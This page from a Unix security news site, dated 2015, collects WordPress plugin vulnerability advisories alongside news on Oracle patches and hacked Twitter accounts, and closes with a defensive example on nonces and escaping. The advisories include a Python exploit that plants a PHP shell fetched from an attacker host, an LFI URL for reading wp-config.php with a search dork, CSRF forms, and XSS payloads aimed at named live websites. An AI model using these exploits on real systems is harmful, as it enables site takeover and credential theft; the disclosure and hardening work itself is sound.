MondoUnix Unix, Linux, FreeBSD, BSD, GNU, Kernel , RHEL, CentOS, Solaris, AIX, HP-UX, Mac OS X, Tru64, SCO UnixWare, Xenix, HOWTO, NETWORKING, IPV6

26 Jan 2015

WordPress Pixarbay Images 2.3 XSS / Bypass / Upload / Traversal

 Mogwai Security Advisory MSA-2015-01
----------------------------------------------------------------------
  Title:              WP Pixarbay Images Multiple Vulnerabilities
  Product:            Pixarbay Images (Wordpress Plugin)
  Affected versions:  2.3
  Impact:             high
  Remote:             yes
  Product link:       https://wordpress.org/plugins/pixabay-images/
  Reported:           14/01/2015
  by:                 Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench)
 
 
Vendor's Description of the Software:
----------------------------------------------------------------------
Pixabay Images is a WordPress plugin that lets you pick CC0 public domain pictures from Pixabay and insert them with just a click anywhere on your blog. The images are safe to use, and paying attribution or linking back to the source is not required.
 
 
Business recommendation:
----------------------------------------------------------------------
Update to version 2.4
 
Vulnerability description:
----------------------------------------------------------------------
1) Authentication bypass
The plugin does not correctly check whether the user is logged in, so certain code can be called without authentication.
 
2) Arbitrary file upload
The plugin code does not validate the host in the provided download URL, which allows an attacker to upload malicious files, including PHP code.
 
3) Path Traversal
Certain values are not sanitized before they are used in a file operation, which allows files to be stored outside of the "download" folder.
 
4) Cross Site Scripting (XSS)
The generated author link uses unsanitized user values, which can be abused for Cross Site Scripting (XSS) attacks.
 
 
Proof of concept:
----------------------------------------------------------------------
The following PoC Python script can be used to download PHP files from
an attacker-controlled host.
 
#!/usr/bin/env python
# Python 2 script: httplib, urllib.urlencode, urlparse and the print
# statements below are Python 2 only.
 
import argparse
import httplib, urllib
from urlparse import urlparse
 
def exploit(target_url, shellcode_url):
 
  target = urlparse(target_url)
 
  # Request parameters from the advisory's vulnerability description:
  # 'image_url' (item 2) and 'q' (item 3).
  params = urllib.urlencode({'pixabay_upload': 1, 'image_url': shellcode_url,
                             'image_user': 'none', 'q': 'xxx/../../../../../../mogwai'})
  headers = {"Content-type": "application/x-www-form-urlencoded"}
 
  print "[+] Sending download request...."
  conn = httplib.HTTPConnection(target.netloc)
  conn.request("POST", target.path + "/wp-admin/", params, headers)
 
  response = conn.getresponse()
  response_data = response.read()
  if response.status != 200 and response_data != "Error: File attachment metadata error":
    print "[-] Something went wrong"
    print response_data
    exit()
 
  conn.close()
 
 
# ---- Main code ----------------
parser = argparse.ArgumentParser()
parser.add_argument("target_url",
                    help="The target url, for example http://foo.bar/blog/")
parser.add_argument("shellcode_url",
                    help="The url of the PHP file that should be uploaded, for example: http://attacker.com/shell.php")
 
print "----------------------------------------------"
print " pixabay upload wordpress plugin exploit PoC"
print " Mogwai security"
print "----------------------------------------------"
 
arguments = parser.parse_args()
exploit(arguments.target_url, arguments.shellcode_url)
 
 
Vulnerable / tested versions:
----------------------------------------------------------------------
Pixabay Images 2.3
 
Disclosure timeline:
----------------------------------------------------------------------
14/01/2014: Reporting issues to the plugin author
15/01/2014: Release of fixed version (2.4)
19/01/2014: Public advisory
 
Advisory URL:
----------------------------------------------------------------------
https://www.mogwaisecurity.de/#lab
 
----------------------------------------------------------------------
Mogwai, IT-Sicherheitsberatung Muench
Steinhoevelstrasse 2/2
89075 Ulm (Germany)
 
info@mogwaisecurity.de


21 Jan 2015

Oracle releases 167 critical security fixes for Java and Sun systems


Oracle has released a critical patch update fixing 167 vulnerabilities across hundreds of its products, warning that the worst of them could be remotely exploited by hackers.

The pressing fixes involve several of Oracle's most widely used products and scored a full 10.0 rating on the CVSS 2.0 Base Score for vulnerabilities, the highest score available.

"The highest CVSS 2.0 Base Score for vulnerabilities in this critical patch update is 10.0 for Fujitsu M10-1 of Oracle Sun Systems Products Suite, Java SE of Oracle Java SE, M10-4 of Oracle Sun Systems Products Suite and M10-4S Servers of Oracle Sun Systems Products Suite," read the advisory.

"Due to the threat posed by a successful attack, Oracle strongly recommends that customers apply critical patch update fixes as soon as possible."

Oracle warned that the updates for Fujitsu M10-1 of Oracle Sun Systems Products Suite are particularly important.

"This critical patch update contains 29 new security fixes for the Oracle Sun Systems Products Suite," the advisory said.

"Ten of these vulnerabilities may be remotely exploitable without authentication [and] may be exploited over a network without the need for a username and password."

The Oracle Java SE update fixes 19 flaws, 14 of which were also remotely exploitable.

The next most serious flaws relate to Oracle's Fusion Middleware, which received 35 security fixes. The worst carries a 9.3 rating and could also be remotely exploited.

The update follows reports that hackers are targeting enterprise companies with malware-laden patches purporting to come from Oracle.

The news comes during a period of heated debate about patching best practice. Microsoft announced plans on 9 January to stop offering non-paying customers advanced patch notifications.

The announcement led to a backlash in the security community, many feeling that the move is a money-grabbing tactic by Microsoft.

Prior to the move, Microsoft came to blows with Google over the search firm's public disclosure of a Windows bug.

Google Project Zero researchers publicly disclosed the bug in December 2014 having privately reported it to Microsoft in September. The move led to a debate about what constitutes responsible threat disclosure.

Source: http://www.v3.co.uk/v3-uk/news/2391065/oracle-releases-167-critical-security-fixes-for-java-and-sun-systems

19 Jan 2015

New York Post and UPI Twitter accounts hacked


The Twitter accounts of the New York Post and United Press International (UPI) have been hacked with fake tweets on economic and military news.

In one post, the Pope was quoted on UPI's Twitter feed as saying that "World War III has begun".

Meanwhile, the New York Post's account said that hostilities had broken out between the United States and China.

It is the latest hack of a high-profile social media account, four days after US military command was compromised.

UPI, which is based in Washington, confirmed in a statement that both its Twitter account and news website had been hacked.

Six fake headlines were posted on its Twitter account and a breaking news banner was added to a fake story about the Federal Reserve on its homepage, the statement added.

A tweet on the New York Post's account said the USS George Washington, an aircraft carrier, was "engaged in active combat" against Chinese warships in the South China Sea.

A Pentagon official said the tweet about hostilities with China was "not true", AFP reports. The tweets have all since been deleted.

The New York Post says it is investigating the hack.

It comes just days after US President Barack Obama unveiled proposals to strengthen cyber security laws after a spate of attacks on high-profile US targets, including the Pentagon Twitter feed and Sony Pictures.

The Twitter account of the US military command was suspended last Monday following an attack by hackers claiming to support Islamic State.

In November hackers also released reams of confidential data stolen from Sony Pictures, and in recent years cyber criminals have attacked other US companies such as Home Depot and Target.

A number of media organisations, including AFP and the BBC, have also been subjected to cyber attacks over the past two years.

Source: http://www.bbc.com/news/world-us-canada-30853311

19 Jan 2015

WordPress CIP4 Folder Download 1.10 Local File Inclusion

# Exploit Title: CIP4 Folder Download Widget LFI
# Google Dork: index of :/cip4-folder-download-widget
# Date: 13-01-2015
# Exploit Author: Ben khlifa Fahmi (XTnR3v0lt)
# Vendor Homepage: http://community.cip4.org
# Software Link: https://wordpress.org/plugins/cip4-folder-download-widget/
# Version: 1.10
# Tested on: Ubuntu 14.04
 
Dork : 
inurl:/wp-content/plugins/cip4-folder-download-widget/
 
Exploit : 
http://localhost/[wordpress]/wp-content/plugins/cip4-folder-download-widget/cip4-download.php?target=wp-config.php&info=wp-config.php
 
Ben khlifa Fahmi - Founder & CEO of Tunisian Cyber Army
Greetz to : Joseph - Michou - hackerXben - RaisoMos - Lola - All muslim hackers world wide


14 Jan 2015

WordPress Slideoptinprox Cross Site Scripting

|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
|-------------------------------------------------------------------------|
|[*] Exploit Title: Wordpress slideoptinprox Plugin Cross site scripting vulnerability
|
|[*] Google Dork: inurl:"/wp-content/plugins/slideoptinprox/"
|
|[*] Date : 2015-01-08
|
|[*] Exploit Author: Ashiyane Digital Security Team
|
|[*]Vendor Homepage : https://pluginu.com/slideoptinprox/
|
|[*] Tested on: Windows 8.1,Kali Linux
|
|-------------------------------------------------------------------------|
|
|[*] Location :
[localhost]/wp-content/plugins/slideoptinprox/inc/ar_submit.php?id=2&n=[XSS]
|
|-------------------------------------------------------------------------|
|[*] Proof:
|
|[*]
http://www.fishingfanatic.us/wp-content/plugins/slideoptinprox/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
|
|[*]
http://www.beziehung-retten24.com//wp-content/plugins/slideoptinprox/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
|
|[*]
http://voiceacting.com/blog//wp-content/plugins/slideoptinprox/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
|
|[*]
http://drdebranixon.com/wp-content/plugins/slideoptinprox/app/view.php?id=2%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
|
|[*]
http://pinguin-werkstatt.com//wp-content/plugins/slideoptinprox/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E|
|-------------------------------------------------------------------------|
|[*] Discovered By : 4L1R3Z4                                              |
|-------------------------------------------------------------------------|
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|


14 Jan 2015

WordPress Simple Security Plugin XSS vulnerabilities

Advisory ID: HTB23244
Product: Simple Security WordPress Plugin
Vendor: MyWebsiteAdvisor 
Vulnerable Version(s): 1.1.5 and probably prior
Tested Version: 1.1.5
Advisory Publication:  December 17, 2014  [without technical details]
Vendor Notification: December 17, 2014 
Public Disclosure: January 14, 2015 
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-9570
Risk Level: Low 
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Solution Status: Solution Available
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 
-----------------------------------------------------------------------------------------------
 
Advisory Details:
 
High-Tech Bridge Security Research Lab discovered two XSS vulnerabilities in the Simple Security WordPress plugin, which 
can be exploited to perform Cross-Site Scripting attacks against administrators of WordPress websites running the vulnerable 
plugin.
 
 
1) Two Cross-Site Scripting (XSS) Vulnerabilities in Simple Security Wordpress Plugin: CVE-2014-9570
 
The discovered vulnerabilities can be used by attackers to steal an administrator's cookies for a vulnerable website. This 
can lead to total website compromise. 
 
Attackers can also perform drive-by download attacks against the website admin by injecting malware or exploit packs into 
the vulnerable scripts.
 
1.1 User-supplied input passed via the "datefilter" HTTP GET parameter to the "/wp-admin/users.php" script is not properly 
sanitised before being returned to the administrator. A remote attacker can trick a logged-in administrator into opening a 
specially crafted link and execute arbitrary HTML and script code in the administrator's browser in the context of the vulnerable 
website.
 
The exploitation example below uses the "alert()" JavaScript function to display the word "ImmuniWeb":
 
http://[host]/wp-admin/users.php?page=access_log&datefilter=%27%22%3E%3Cscript%3Ealert%28/ImmuniWeb/%29;%3C/script%3E
 
1.2 User input passed via the "simple_security_ip_blacklist[]" HTTP POST parameter to the "/wp-admin/users.php" script is 
not properly filtered before being returned to the administrator. A remote attacker can trick a logged-in administrator 
into opening a specially crafted link and execute arbitrary HTML and script code in the administrator's browser in the context of the vulnerable 
website.
 
Below we provide a basic XSS exploit that uses the JavaScript "alert()" function to display an "ImmuniWeb" pop-up:
 
 
<form action="http://[host]/wp-admin/users.php?page=ip_blacklist" method="post" name="main">
<input type="hidden" name="page" value="access_log">
<input type="hidden" name="action" value="add_blacklist_ip">
<input type="hidden" name="simple_security_ip_blacklist[]" value="'><script>alert('ImmuniWeb');</script>">
<input type="submit" id="btn">
</form>
 
 
-----------------------------------------------------------------------------------------------
 
Solution:
 
Disclosure timeline:
2014-12-17 Vendor Alerted via contact form.
2014-01-02 Vendor Alerted via contact form and emails.
2014-01-12 Fix Requested via contact form and emails.
2014-01-14 Public disclosure with self-written patch.
 
Currently we are not aware of any official solution for this vulnerability.
Unofficial patch was developed by High-Tech Bridge Security Research Lab and is available here: 
https://www.htbridge.com/advisory/HTB23244-patch.zip
 
-----------------------------------------------------------------------------------------------
 
References:
 
[1] High-Tech Bridge Advisory HTB23244 - https://www.htbridge.com/advisory/HTB23244 - Two XSS vulnerabilities in Simple 
Security WordPress plugin.
[2] Simple Security Wordpress Plugin - http://mywebsiteadvisor.com/ - Simple Security Plugin for WordPress is a basic 
Access Log system that can monitor successful and failed login attempts and block IP addresses.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public 
use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE 
is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and 
cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
 
-----------------------------------------------------------------------------------------------
 
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details 
of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.


14 Jan 2015

WordPress WP Unique Article Header Image 1.0 CSRF / XSS

**************************************************************************************
# Title: CSRF / Stored XSS Vulnerability in WP Unique Article Header Image Wordpress Plugin 
# Author: Manideep K  
# cve-id : CVE-2014-9400
# Plugin Homepage: https://wordpress.org/plugins/wp-unique-article-header-image/
# Version Affected: 1.0  (probably lower versions)
# Severity: High 
 
# Description: 
Vulnerable Parameter: gt_default_header and gt_homepage_header
# Vulnerability Class:
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29          
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)) 
 
# About Vulnerability: This plugin is vulnerable to a combination of CSRF and XSS: if an admin user can be tricked into visiting a crafted URL created by the attacker (via spear phishing or social engineering), the attacker can insert arbitrary script into the admin page. Once exploited, the admin's browser can be made to do almost anything the admin user could normally do, for example by hijacking the admin's cookies. 
 
 
# Steps to Reproduce: (POC):
After installing the plugin
1. Go to Settings -> GT Unique Header Image
2. Insert the payload "><script>alert(32)</script> into either or both of the fields "default post/page header image" and "home page header" 
Save the settings and see the XSS in action
3. Visit the settings page of this plugin at any later time and you can see the script executing, as it is stored. 
 
 
The plugin does not use any nonces, hence the same settings can be changed via a CSRF attack; the PoC code for this is below:
 
<html>
  <body>
    <form action="http://localhost/wordpress/wp-admin/options-general.php?page=wp-unique-article-header-image/wp-unique-header.php" method="POST">
      <input type="hidden" name="setting" value="true" />
      <input type="hidden" name="gt_default_header" value="csrf attack" />
      <input type="hidden" name="gt_homepage_header" value="hi" />
      <input type="hidden" name="gt-header-option-submitted" value="Save Settings » " />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
 
 
# Mitigation: 
Plugin closed
 
# Disclosure:
2014-11-06:  Author notification
2014-11-20:  WP Team action taken by closing the plugin as there is no response from author
2014-12-09: Public Disclosure
 
# Credits:
Manideep K
Information Security Researcher
https://in.linkedin.com/in/manideepk
***************************************************************************************


14 Jan 2015

WordPress WP Limit Posts Automatically 0.7 CSRF / XSS

# Title: CSRF / Stored XSS Vulnerability in WP Limit Posts Automatically Wordpress Plugin 
# Author: Manideep K  
# cve-id: CVE-2014-9401
# Plugin Homepage: https://wordpress.org/plugins/wp-limit-posts-automatically/
# Version Affected: 0.7 (probably lower versions)
# Severity: High 
 
# Description: 
# Vulnerable Parameter:  all text fields (e.g. lpa_post_letters)
# About Vulnerability: This plugin is vulnerable to a combination of CSRF and XSS: if an admin user can be tricked into visiting a crafted URL created by the attacker (via spear phishing or social engineering), the attacker can insert arbitrary script into the admin page. Once exploited, the admin's browser can be made to do almost anything the admin user could normally do, for example by hijacking the admin's cookies. 
# Vulnerability Class:     
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29          
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)) 
 
Steps to Reproduce: (POC):
After installing the plugin
 
Stored XSS: 
1.  Go to Settings -> Limit Posts Options
2.  Enter the payload "><script>alert(32)</script> in any of the text columns. There is no input validation at all. 
3.  Save the changes and see the XSS in action
4.  Visit the settings page of this plugin at any later time and you can see the script executing, as it is stored. 
 
The plugin does not use any nonces, hence the same settings can be changed via a CSRF attack; the PoC code for this is below:
 
<html>
  <body>
    <form action="http://localhost/wordpress/wp-admin/options-general.php?page=wp-limit-posts-automatically/wp-limit-posts-automatically.php" method="POST">
      <input type="hidden" name="lpa_post_wordcut" value="Lettercut" />
      <input type="hidden" name="lpa_post_letters" value=" csrf baby" />
      <input type="hidden" name="lpa_post_ending" value="hi" />
      <input type="hidden" name="lpa_post_linktext" value="hi" />
      <input type="hidden" name="submitted" value="yes" />
      <input type="hidden" name="Submit" value="Update Options »" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
 
 
# Mitigation: 
Reported - Not yet fixed
 
# Disclosure:
2014-11-06:  Author notification
2014-11-20:  WP Team action taken by closing the plugin as there is no response from author
2014-12-09: Public Disclosure
 
# Credits:
Manideep K
Information Security Researcher
https://in.linkedin.com/in/manideepk


14 Jan 2015

WordPress TweetScribe 1.1 CSRF / XSS

**************************************************************************************
# Title: CSRF / Stored XSS Vulnerability in TweetScribe Wordpress Plugin 
# Author: Manideep K  
# CVE-ID: CVE-2014-9399
# Plugin Homepage: https://wordpress.org/plugins/tweetscribe/
# Version Affected: 1.1  (probably lower versions)
# Severity: High 
 
# Description: 
Vulnerable Parameter: tweetscribe_username
Vulnerability Class: 
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29          
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)) 
 
# About Vulnerability:  This plugin is vulnerable to a combination of CSRF and XSS: if an admin user can be tricked into visiting a crafted URL created by the attacker (via spear phishing or social engineering), the attacker can insert arbitrary script into the admin page. Once exploited, the admin's browser can be made to do almost anything the admin user could normally do, for example by hijacking the admin's cookies.
 
# Steps to Reproduce: (POC):
After installing the plugin
1. Go to Settings -> Tweetscribe
2. Insert the payload "><script>alert(32)</script> into the username field 
Update the options and see the XSS in action
3. Visit the settings page of this plugin at any later time and you can see the script executing, as it is stored. 
 
The plugin does not use any nonces, hence the same settings can be changed via a CSRF attack; the PoC code for this is below:
 
<html>
  <body>
    <form action="http://localhost/wordpress/wp-admin/options-general.php?page=tweetscribe/tweetscribe.php&op=save" method="POST">
      <input type="hidden" name="tweetscribe_username" value="csrf baby" />
      <input type="hidden" name="tweetscribe_password" value="mdndnnd" />
      <input type="hidden" name="tweetscribe_text" value="test" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
 
 
# Mitigation: 
Plugin Closed
 
# Disclosure:
2014-11-06:  Author notification
2014-11-20:  WP Team action taken by closing the plugin as there is no response from author
2014-12-09: Public Disclosure
 
# Credits:
Manideep K
Information Security Researcher
https://in.linkedin.com/in/manideepk
***************************************************************************************


14 Jan 2015

WordPress Twitter LiveBlog 1.1.2 CSRF / XSS

# Title: CSRF / Stored XSS Vulnerability in Twitter LiveBlog Wordpress Plugin 
# Author: Manideep K  
# CVE-ID: CVE-2014-9398 
# Plugin Homepage: https://wordpress.org/plugins/twitter-liveblog/
# Version Affected: 1.1.2 (probably lower versions)
# Severity: High 
 
# Description: 
# Vulnerable Parameter:  mashtlb_twitter_username etc
# About Vulnerability: This plugin is vulnerable to a combination of CSRF and XSS: if an admin user can be tricked into visiting a crafted URL created by the attacker (via spear phishing or social engineering), the attacker can insert arbitrary script into the admin page. Once exploited, the admin's browser can be made to do almost anything the admin user could normally do, for example by hijacking the admin's cookies. 
# Vulnerability Class:     
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29          
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)) 
 
Steps to Reproduce: (POC):
After installing the plugin
 
Stored XSS: 
1.  Go to Settings -> Twitter LiveBlog
2.  Enter the payload "><script>alert(32)</script> in any or all of the text fields. 
3.  Save the changes and see the XSS in action
4.  Visit the settings page of this plugin at any later time and you can see the script executing, as it is stored. 
 
The plugin does not use any nonces, hence the same settings can be changed via a CSRF attack; the PoC code for this is below:
 
<html>
  <body>
    <form action="http://localhost/wordpress/wp-admin/options-general.php?page=twitter-liveblog.php" method="POST">
      <input type="hidden" name="mashtlb_twitter_username" value="csrf baby" />
      <input type="hidden" name="mashtlb_twitter_password" value="hi" />
      <input type="hidden" name="mashtlb_blog_post_category" value="1" />
      <input type="hidden" name="mashtlb_blog_post_tags" value="be" />
      <input type="hidden" name="mashtlb_blog_post_author" value="1" />
      <input type="hidden" name="mashtlb_twitter_interval" value="10" />
      <input type="hidden" name="mashtlb_twitter_liveblog_interval" value="2" />
      <input type="hidden" name="mashtlb_update_settings" value="Update Options" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
 
 
# Mitigation: 
Reported - Not yet fixed
 
# Disclosure:
2014-11-06:  Author notification
2014-11-20:  WP Team action taken by closing the plugin as there is no response from author
2014-12-09: Public Disclosure
 
# Credits:
Manideep K
Information Security Researcher
https://in.linkedin.com/in/manideepk
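The four Manideep K advisories on this page (WP Unique Article Header Image, WP Limit Posts Automatically, TweetScribe and Twitter LiveBlog), the HTB23244 Simple Security advisory, the Slideoptinprox advisory and items 1 and 4 of the Pixabay Images advisory all describe the same two gaps in a settings handler: a state-changing request that is accepted without a per-user, per-action token (or, in the Pixabay case, without a login check at all), and a stored or reflected value echoed back into HTML unescaped. The Python below is an added example for this page, not code from any of these plugins or their authors; the HMAC-based nonce is modelled on how WordPress nonces work (a secret, a time tick, the action and the user id, with the previous tick still accepted) but is an illustrative analogue, not WordPress's implementation, and the secret, tick length, action name and form field names are constructed assumptions.

```python
import hmac
import hashlib
import time
from html import escape
from typing import Dict, Optional, Tuple

# Constructed secret for this example only. A real site loads it from
# configuration (WordPress derives nonces from the salts in wp-config.php).
SECRET_KEY = b"example-only-secret-do-not-reuse"
TICK_SECONDS = 12 * 60 * 60  # tokens are accepted for the current and the previous tick
ACTION = "save_plugin_settings"  # hypothetical action name for the settings form


def _tick(now: float) -> int:
    return int(now // TICK_SECONDS)


def _nonce_for_tick(tick: int, user_id: int, action: str) -> str:
    # Binding the token to the user and to one action means a token leaked
    # from page A cannot be replayed against form B, nor used by another user.
    msg = f"{tick}|{action}|{user_id}".encode()
    return hmac.new(SECRET_KEY, msg, hashlib.sha256).hexdigest()[:20]


def create_nonce(user_id: int, action: str, now: Optional[float] = None) -> str:
    """Token to embed as a hidden field in the legitimate settings form."""
    now = time.time() if now is None else now
    return _nonce_for_tick(_tick(now), user_id, action)


def verify_nonce(nonce: str, user_id: int, action: str, now: Optional[float] = None) -> bool:
    """True if the token was minted for this user and action in the current
    or previous tick. compare_digest avoids a timing side channel."""
    now = time.time() if now is None else now
    tick = _tick(now)
    for t in (tick, tick - 1):
        if hmac.compare_digest(_nonce_for_tick(t, user_id, action), nonce):
            return True
    return False


def handle_settings_post(form: Dict[str, str], session_user_id: Optional[int],
                         can_manage_options: bool,
                         now: Optional[float] = None) -> Tuple[int, str]:
    """Gate a settings-update POST the way a hardened plugin should.

    Order matters: an unauthenticated or under-privileged caller is refused
    before the body is looked at, and a request forged from another origin
    fails the token check because the attacker cannot compute the token.
    """
    if session_user_id is None:
        return 401, "login required"
    if not can_manage_options:
        return 403, "insufficient capability"
    nonce = form.get("_wpnonce", "")  # hidden-field name assumed for the example
    if not verify_nonce(nonce, session_user_id, ACTION, now):
        return 403, "nonce check failed"
    return 200, "saved"


def render_setting_input(name: str, stored_value: str) -> str:
    """Re-render a stored setting inside an HTML attribute without letting it
    break out of the attribute: quotes and angle brackets become entities, so
    the payload from the advisories stays inert when the page is viewed later."""
    return (f'<input type="text" name="{escape(name, quote=True)}" '
            f'value="{escape(stored_value, quote=True)}">')


if __name__ == "__main__":
    # Constructed sample: a legitimate save, then the same body without a token.
    token = create_nonce(1, ACTION)
    print(handle_settings_post({"_wpnonce": token, "gt_default_header": "x"}, 1, True))
    print(handle_settings_post({"gt_default_header": "x"}, 1, True))
    print(render_setting_input("gt_default_header", '"><script>alert(32)</script>'))
```

In an actual WordPress plugin the same three steps are `current_user_can('manage_options')`, `check_admin_referer()` (or `wp_verify_nonce()` on a field emitted by `wp_nonce_field()`), and `esc_attr()` around every stored value written into an attribute; the escaping step is still required even with a nonce, because the nonce only stops the cross-site write, not an administrator who pastes the payload themselves.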
